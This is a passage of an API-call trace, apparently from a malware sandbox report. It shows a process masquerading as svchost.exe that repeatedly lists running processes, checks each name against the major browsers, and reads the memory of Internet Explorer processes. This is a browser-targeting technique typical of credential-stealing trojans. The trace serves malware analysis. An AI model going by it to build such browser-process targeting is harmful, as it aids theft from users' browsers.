	[0197.802] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.802] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0197.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.803] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0197.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x14e4
	[0197.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.804] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0197.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.804] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.804] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0197.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.805] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0197.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x14e8
	[0197.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.806] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0197.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.806] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.807] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0197.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.807] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.808] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0197.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x14ec
	[0197.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.809] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0197.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.809] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.809] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0197.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.810] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.810] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0197.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x14f0
	[0197.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.811] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0197.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.811] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.812] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0197.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.812] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.812] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0197.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x14f4
	[0197.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.813] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0197.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.814] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.814] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0197.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.815] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.815] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0197.816] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x14f8
	[0197.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.816] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0197.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.816] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.816] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0197.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.817] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.817] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0197.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x14fc
	[0197.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.818] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0197.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.818] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.818] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0197.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.818] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.819] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0197.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1500
	[0197.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.819] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0197.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.820] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.820] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0197.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.821] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.821] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0197.822] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1504
	[0197.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.822] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0197.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.823] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.823] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0197.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.824] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.860] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0197.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1508
	[0197.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.861] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0197.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.862] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.862] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0197.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.863] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.863] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0197.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x150c
	[0197.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.864] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0197.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.865] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.865] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0197.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.866] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.867] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0197.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1510
	[0197.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.867] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0197.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.868] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.868] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0197.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.869] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.869] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0197.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1514
	[0197.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.870] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0197.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.870] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0197.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.871] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0197.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.871] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.871] NtQueryInformationProcess (in: ProcessHandle=0x1514, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0197.871] ReadProcessMemory (in: hProcess=0x1514, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0197.871] ReadProcessMemory (in: hProcess=0x1514, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0197.871] ReadProcessMemory (in: hProcess=0x1514, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0197.871] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0197.872] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0197.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1518
	[0197.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.873] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0197.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.873] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0197.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.873] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0197.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.873] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.874] NtQueryInformationProcess (in: ProcessHandle=0x1518, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0197.874] ReadProcessMemory (in: hProcess=0x1518, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0197.874] ReadProcessMemory (in: hProcess=0x1518, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0197.874] ReadProcessMemory (in: hProcess=0x1518, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0197.874] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0197.874] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0197.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x151c
	[0197.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.875] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0197.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.875] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.876] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0197.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.876] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.876] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0197.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1520
	[0197.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.877] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0197.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.877] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.878] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0197.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.878] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.878] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1524
	[0197.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.879] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.879] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.880] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.880] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.880] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.881] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0197.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1528
	[0197.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.882] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.882] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.882] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.883] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.883] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.884] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x152c
	[0197.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.884] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.884] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.884] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.884] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.885] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.885] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0197.885] CloseHandle (hObject=0x188) returned 1
	[0197.886] Sleep (dwMilliseconds=0x64) 
	[0198.007] GetCurrentProcessId () returned 0x110
	[0198.007] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0198.010] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0198.010] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0198.011] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0198.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1530
	[0198.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.012] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.012] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.013] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.013] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1534
	[0198.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.014] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.014] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.015] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.015] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
